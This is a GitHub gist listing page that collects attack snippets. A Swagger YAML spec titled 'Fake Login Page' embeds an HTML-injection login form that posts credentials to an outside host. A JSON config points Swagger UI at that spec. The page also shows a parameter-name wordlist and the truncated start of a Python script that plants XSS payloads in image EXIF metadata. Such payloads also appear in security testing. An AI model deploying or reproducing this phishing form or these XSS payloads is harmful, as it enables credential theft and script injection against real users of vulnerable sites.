Skip to content

Instantly share code, notes, and snippets.

@0xbloody
0xbloody / test.json
Last active October 28, 2024 16:06 — forked from zenelite123/test.json
{
"url": "https://gist.githubusercontent.com/0xbloody/b240c3f3e11aefeab1294629f18ed60b/raw/3bfea13b2df0589292d6100498e3c8e2cc2d5a1b/test.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/0xbloody/b240c3f3e11aefeab1294629f18ed60b/raw/3bfea13b2df0589292d6100498e3c8e2cc2d5a1b/test.yaml",
"name": "Test"
}
]
}
{
"url": "https://gist.githubusercontent.com/0xbloody/b240c3f3e11aefeab1294629f18ed60b/raw/3bfea13b2df0589292d6100498e3c8e2cc2d5a1b/test.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml",
"name": "Foo"
}
]
}
@0xbloody
0xbloody / test.yaml
Last active October 28, 2024 15:57 — forked from zenelite123/test.yaml
swagger: '2.0'
info:
version: 1.0.0
title: Fake Login Page
description: '<div class="login-form">
<div class="heading">
<h1>HTML Injection : Fake Login</h1>
</div>
<div class="form-container">
<form action="https://7y0ejvxb.c5.rs/login" method="post" class="form-signin">
Tracker
__gaTracker
_csrf_token
_ga
a
accept_latest_tos_url
access_level
active
admin
adrevenue
@0xbloody
0xbloody / exifxss.py
Created December 5, 2023 17:30 — forked from hash3liZer/exifxss.py
Embedding XSS payloads in the Exif Metadata fields of and image
import sys
import subprocess
exifs = [
"ImageDescription",
"Make",
"Model",
"Software",
"Artist",
"Copyright",